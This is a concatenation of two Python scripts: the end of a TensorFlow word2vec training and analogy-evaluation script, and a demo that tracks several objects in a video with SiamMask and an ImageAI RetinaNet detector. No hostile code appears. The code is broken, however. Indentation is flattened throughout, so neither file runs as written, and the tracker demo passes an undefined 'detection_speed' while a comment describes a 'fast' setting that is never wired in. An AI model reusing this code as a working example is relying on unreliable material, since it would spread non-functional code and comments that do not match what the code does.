for question in xrange(sub.shape[0]):
for j in xrange(4):
if idx[question, j] == sub[question, 3]:
# Bingo! We predicted correctly. E.g., [italy, rome, france, paris].
correct += 1
break
elif idx[question, j] in sub[question, :3]:
# We need to skip words already in the question.
continue
else:
# The correct label is not the precision@1
break
print()
print("Eval %4d/%d accuracy = %4.1f%%" % (correct, total,
correct * 100.0 / total))
def analogy(self, w0, w1, w2):
"""Predict word w3 as in w0:w1 vs w2:w3."""
wid = np.array([[self._word2id.get(w, 0) for w in [w0, w1, w2]]])
idx = self._predict(wid)
for c in [self._id2word[i] for i in idx[0, :]]:
if c not in [w0, w1, w2]:
return c
return "unknown"
def nearby(self, words, num=20):
"""Prints out nearby words given a list of words."""
ids = np.array([self._word2id.get(x, 0) for x in words])
vals, idx = self._session.run(
[self._nearby_val, self._nearby_idx], {self._nearby_word: ids})
for i in xrange(len(words)):
print("\n%s\n=====================================" % (words[i]))
for (neighbor, distance) in zip(idx[i, :num], vals[i, :num]):
print("%-20s %6.4f" % (self._id2word[neighbor], distance))
def _start_shell(local_ns=None):
# An interactive shell is useful for debugging/development.
import IPython
user_ns = {}
if local_ns:
user_ns.update(local_ns)
user_ns.update(globals())
IPython.start_ipython(argv=[], user_ns=user_ns)
def main(_):
"""Train a word2vec model."""
if not FLAGS.train_data or not FLAGS.eval_data or not FLAGS.save_path:
print("--train_data --eval_data and --save_path must be specified.")
sys.exit(1)
opts = Options()
with tf.Graph().as_default(), tf.Session() as session:
with tf.device("/cpu:0"):
model = Word2Vec(opts, session)
for _ in xrange(opts.epochs_to_train):
model.train() # Process one epoch
model.eval() # Eval analogies.
# Perform a final save.
model.saver.save(session,
os.path.join(opts.save_path, "model.ckpt"),
global_step=model.global_step)
if FLAGS.interactive:
# E.g.,
# [0]: model.analogy(b'france', b'paris', b'russia')
# [1]: model.nearby([b'proton', b'elephant', b'maxwell'])
_start_shell(locals())
if __name__ == "__main__":
tf.app.run()
|
new-demo.py
|
import glob
from test import *
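# NOTE: the star import is assumed to provide argparse, cv2, torch, and the
# SiamMask helpers (load_config, load_pretrain, siamese_init, siamese_track,
# isfile, join) used below.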
import time
import numpy as np
import torch.multiprocessing as mp
import queue as Queue
from multiprocessing import Pool
import itertools
from multiprocessing.dummy import Pool as ThreadPool
from pathos.multiprocessing import ProcessingPool
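# The multiprocessing imports above appear to be leftovers from the
# commented-out parallel-tracking experiments further down; they are unused.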
# import model as modellib
from imageai.Detection import ObjectDetection
import os
execution_path = os.getcwd()
parser = argparse.ArgumentParser(description='PyTorch Tracking Demo')
parser.add_argument('--resume', default='', type=str, required=True,
metavar='PATH', help='path to latest checkpoint (default: none)')
parser.add_argument('--config', dest='config', default='config_davis.json',
help='hyper-parameter of SiamMask in json format')
parser.add_argument('--base_path', default='../../data/tennis', help='datasets')
parser.add_argument('--cpu', action='store_true', help='cpu mode')
args = parser.parse_args()
if __name__ == '__main__':
# Setup device
model="fast"
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
torch.backends.cudnn.benchmark = True
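# ImageAI RetinaNet object detector; the "fast" detection speed trades some
# accuracy for lower per-frame latency.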
detector = ObjectDetection()
detector.setModelTypeAsRetinaNet()
detector.setModelPath(os.path.join(execution_path, "resnet50_coco_best_v2.0.1.h5"))
detector.loadModel(detection_speed=detection_speed)
# Setup Model
cfg = load_config(args)
from custom import Custom
siammask = Custom(anchors=cfg['anchors'])
if args.resume:
assert isfile(args.resume), 'Please download {} first.'.format(args.resume)
siammask = load_pretrain(siammask, args.resume)
siammask.eval().to(device)
# Parse image files
img_files = sorted(glob.glob(join(args.base_path, '*.jp*')))
ims = [cv2.imread(imf) for imf in img_files]
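# NOTE: img_files/ims are not used below; frames are read from the
# VideoCapture instead.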
# cap = cv2.VideoCapture("/home/ubuntu/Desktop/Videos/nascar_01.mp4")
#cap = cv2.VideoCapture("/home/ubuntu/Desktop/Videos/race.mp4")
cap = cv2.VideoCapture("/Users/alexzhang/Desktop/test_video.mp4")
frame_width = int(cap.get(3))
frame_height = int(cap.get(4))
# out = cv2.VideoWriter('/Users/alexzhang/Desktop/output.mp4',cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width,frame_height))
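# Re-encode the output as mp4v at 15 FPS; frames written below must match
# (frame_width, frame_height) for the writer to accept them.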
out = cv2.VideoWriter('/Users/alexzhang/Desktop/output.mov',cv2.VideoWriter_fourcc('m','p','4','v'), 15, (frame_width,frame_height))
if not cap.isOpened():
print("Unable to open")
exit()
ret, frame = cap.read()
# Select ROI
cv2.namedWindow("SiamMask", cv2.WND_PROP_FULLSCREEN)
# cv2.setWindowProperty("SiamMask", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
try:
ROIs = cv2.selectROIs('SiamMask', frame, False, False)
except Exception:
print("exit")
exit()
targets = []
for i in ROIs:
x, y, w, h = i
f = 0
toc = 0
while cap.isOpened():
# Capture frame-by-frame
ret, frame = cap.read()
# frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if ret:
tic = cv2.getTickCount()
if f == 0: # init
count = 0
for i in ROIs:
x, y, w, h = i
target_pos = np.array([x + w / 2, y + h / 2])
target_sz = np.array([w, h])
s ={"target_pos":target_pos,"target_sz":target_sz,"x":x,"y":y,"w":w,"h":h}
targets.append(s)
for i in targets:
print(i["target_pos"])
print(i["target_sz"])
# state = siamese_init(frame,tar siammask, cfg['hp'], device=device,targets=targets) # init tracker
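# NOTE: this appears to be a multi-object variant of the stock SiamMask demo:
# siamese_init is assumed to take a list of targets plus the object detector
# rather than a single target_pos/target_sz pair.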
state = siamese_init(frame, siammask, cfg['hp'], device=device,targets=targets,detector=detector) # init tracker
# state1 = siamese_init(frame, target_pos1, target_sz1, siammask, cfg['hp'], device=device) # init tracker
elif f > 0: # tracking
state = siamese_track(state, frame)
# pool = ProcessingPool(nodes=1)
# state =pool.map(siamese_track, state, frame)
# results = pool.map(multi_run_wrapper,[(1,2),(2,3),(3,4)])
# state = pool.starmap(siamese_track,zip(state, frame))
# [state, frame, mask_enable=True, refine_enable=True, device=device)]
# my_queue = Queue.Queue()
# processes=[]
# for rank in range(num_processes):
# # state = siamese_track(state, frame, mask_enable=True, refine_enable=True, device=device) # track
# refine_enable=True
# mask_enable=True
# device=device
# p = mp.Process(target=siamese_track,args=(state, frame, mask_enable,refine_enable,my_queue, ))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
# state = my_queue.get()
# print(state)
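# Overlay each target's segmentation mask on the frame's red channel and draw
# its rotated bounding box (the misspelled 'ploygon' key is kept to match the
# tracker's output).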
for i,target in enumerate(state["targets"]):
location = target['ploygon'].flatten()
mask = target['mask'] > state['p'].seg_thr
masks = (mask > 0) * 255
masks = masks.astype(np.uint8)
frame[:, :, 2] = (mask > 0) * 255 + (mask == 0) * frame[:, :, 2]
# frame[:, :, 2] = (mask1 > 0) * 255 + (mask1 == 0) * frame[:, :, 2]
cv2.polylines(frame, [np.int0(location).reshape((-1, 1, 2))], True, (0, 255, 0), 3)
cv2.imshow('SiamMask', frame)
out.write(frame)
print("Frame %d processed at %s" % (f, time.ctime()))
f += 1
toc += cv2.getTickCount() - tic
toc /= cv2.getTickFrequency()
fps = f / toc
# Display the resulting frame
# cv2.imshow('Frame',frame)
# Press Q on keyboard to exit
if cv2.waitKey(25) & 0xFF == ord('q'):
break
# Break the loop
else:
break
out.release()
# When everything done, release the video capture object
cap.release()
# Closes all the frames
cv2.destroyAllWindows()
|